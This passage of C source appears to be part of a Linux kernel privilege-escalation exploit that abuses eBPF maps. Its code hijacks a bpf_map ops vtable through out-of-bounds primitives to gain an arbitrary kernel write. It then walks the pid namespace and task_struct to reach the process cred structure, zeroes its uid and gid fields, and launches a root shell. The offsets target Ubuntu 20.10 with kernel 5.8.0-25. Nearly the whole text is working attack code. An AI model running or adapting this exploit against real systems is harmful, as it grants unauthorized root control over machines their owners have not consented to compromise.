    uint64_t buf[VALUE_SIZE/8];

    memset(buf, 0, VALUE_SIZE);

    uint64_t bpf_map_ops_addr = oob_read64(BPF_MAP_MAP_OPS_OFF);
    
    // clone the genuine ops table out of kernel memory
    for(int i = 0; i < BPF_MAP_OPS_COUNT; i++) {
        g_fake_vtab[i] = read64(bpf_map_ops_addr + (i*8));
    }

    // push_elem -> get_next_key: the write gadget
    g_fake_vtab[BPF_MAP_OPS_PUSH_ELEM_IDX] = 
        g_fake_vtab[BPF_MAP_OPS_GET_NEXT_KEY_IDX];

    g_fake_vtab_enabled = 1;

    uint64_t key = 0;

    union bpf_attr attr_update = {
        .map_fd = g_mapfd,
        .key = (uint64_t)&key,
        .value = (uint64_t)&buf,
    };

    int ret = syscall(
        __NR_bpf, BPF_MAP_UPDATE_ELEM, &attr_update, sizeof(attr_update)
    );

    if (ret != 0) {
        error("%s: failed to update map", __FUNCTION__);
    }

    // snapshot the header fields we are about to clobber
    g_bpfmap_orig.map_ops_ptr   = oob_read64(BPF_MAP_MAP_OPS_OFF);
    g_bpfmap_orig.map_type      = oob_read32(BPF_MAP_MAP_TYPE_OFF);
    g_bpfmap_orig.max_entries   = oob_read32(BPF_MAP_MAX_ENTRIES_OFF);
    g_bpfmap_orig.spin_lock_off = oob_read32(BPF_MAP_SPINLOCK_OFF);

    oob_write64(BPF_MAP_MAP_OPS_OFF, fake_vtable_addr);
    oob_haxmap();
}

void arb_write32(uint64_t addr, uint32_t val) {
    uint64_t key = 0x666;

    uint64_t buf[VALUE_SIZE/8];
    memset(buf, 0, VALUE_SIZE);
    buf[0] = val-1;

    union bpf_attr attr_update = {
        .map_fd = g_mapfd,
        .key = (uint64_t)&key,
        .value = (uint64_t)&buf,
        .flags = addr
    };

    int ret = syscall(
        __NR_bpf, BPF_MAP_UPDATE_ELEM, &attr_update, sizeof(attr_update)
    );

    if (ret != 0) {
        printf("error: read32(0x%016lx, 0x%08x) failed\n", addr, val);
        exit(-1);
    }
}

/*
 * Restore the bpf_map header fields saved by arb_write_install(),
 * undoing the retype/vtable hijack. Ops pointer is restored last so
 * the OOB writes still flow through a consistent map.
 */
void arb_write_uninstall() {
    oob_write32(BPF_MAP_MAP_TYPE_OFF, g_bpfmap_orig.map_type);
    oob_write32(BPF_MAP_MAX_ENTRIES_OFF, g_bpfmap_orig.max_entries);
    oob_write32(BPF_MAP_SPINLOCK_OFF, g_bpfmap_orig.spin_lock_off);
    oob_write64(BPF_MAP_MAP_OPS_OFF, g_bpfmap_orig.map_ops_ptr);
}

/*
 * Exploit flow:
 *   1. install the OOB primitives (bpf_hax_init),
 *   2. leak array_map_ops -> locate init_pid_ns via a naive symbol walk,
 *   3. walk pid namespace radix tree -> our struct pid -> task_struct,
 *   4. follow task_struct to cred and the map's struct bpf_map address,
 *   5. install the arbitrary write, zero the cred uid/gid fields,
 *   6. spawn a root shell.
 *
 * All struct offsets below are for Ubuntu 20.10 / 5.8.0-25-generic.
 */
int main(int argc, char *argv[]) {
    header();

    if (bpf_hax_init() != 0) {
        printf("fail\n");
        return -1;
    }

    // leak a kernel text/data pointer: our map's ops table
    uint64_t array_map_ops = oob_read64(BPF_MAP_MAP_OPS_OFF);
    info_value64("array_map_ops", array_map_ops);

    uint64_t init_pid_ns = resolve_sym_naive(array_map_ops, "init_pid_ns");
    info_value64("init_pid_ns", init_pid_ns);

    /* 
     * struct pid_namespace {
     *   struct kref kref; // @ 0x00
     *   struct idr idr;   // @ 0x08 
     *   ...
     * };
     *
     * struct idr {
     *   struct radix_tree_root idr_rt; // @ 0x00
     *   ...
     * };
     *
     */
    info("finding our pid object.. (pid %d)", getpid());
    uint64_t pid_addr = 
        (uint64_t)radix_tree_lookup(init_pid_ns + 0x8, getpid());

    info_value64("pid struct", pid_addr);

    /*
     * struct pid {
     *   refcount_t count;
     *   unsigned int level;
     *   spinlock_t lock;
     *   struct hlist_head tasks[PIDTYPE_MAX]; // @ 0x10
     *   ..
     * };
     */
    // TODO: Add safety checks before dereffing all this shit
    // tasks[PIDTYPE_PID].first -> pid_links node; -0x08... i.e. the
    // second deref rebases to the containing task_struct
    uint64_t task_addr = read64(
        read64(read64(pid_addr + 0x10) + 0x08)
    );

    info_value64("task", task_addr);

    // task_struct field offsets (kernel-build specific):
    // cred @ 0x130, files @ 0x190 -- TODO confirm on other builds
    uint64_t cred_struct = read64(task_addr + 0x130);
    uint64_t files_struct = read64(task_addr + 0x190);

    info_value64("cred", cred_struct);
    info_value64("files", files_struct);

    // files_struct->fdt, fdt->fd array, then our map fd's struct file
    uint64_t fdt = read64(files_struct + 0x20);
    info_value64("fdt", fdt);

    uint64_t fds = read64(fdt + 8);
    info_value64("fds", fds);

    uint64_t mapfd_ptr = read64(fds + (g_mapfd * 8));
    info_value64("mapfd", mapfd_ptr);

    // file->private_data @ 0xc8 holds the struct bpf_map pointer
    uint64_t bpf_map_addr = read64(mapfd_ptr + 0xc8);
    info_value64("bpf_map", bpf_map_addr);

    info("installing arb write capability..");
    arb_write_install(bpf_map_addr);

    info("elevating privileges..");
    // zero the 8 dwords after cred->usage: uid,gid,suid,sgid,euid,
    // egid,fsuid,fsgid -> root
    for(int i = 0; i < 8; i++) {
        arb_write32(cred_struct + 4 + i*4, 0);
    }


    // TODO: cant do this right now because the map is fucked
    //arb_write_uninstall();
    //oob_write64(BPF_MAP_BTF_OFF, 0);

    if (getuid() == 0 && getgid() == 0 && geteuid() == 0 && getegid() == 0) {
        info("bling bling, we got it!");
        execl("/bin/sh", "/bin/sh", NULL);
    } else {
#ifdef DEBUG_UID    
        printf("getuid: %d\n", getuid());
        printf("getgid: %d\n", getgid());
        printf("geteuid: %d\n", geteuid());
        printf("getegid: %d\n", getegid());
#endif
        error(
            "failed to elevate privileges.\n"
            "I hope your kernel survived the trip. :-(\n"
        );
    }

    return 0;
}
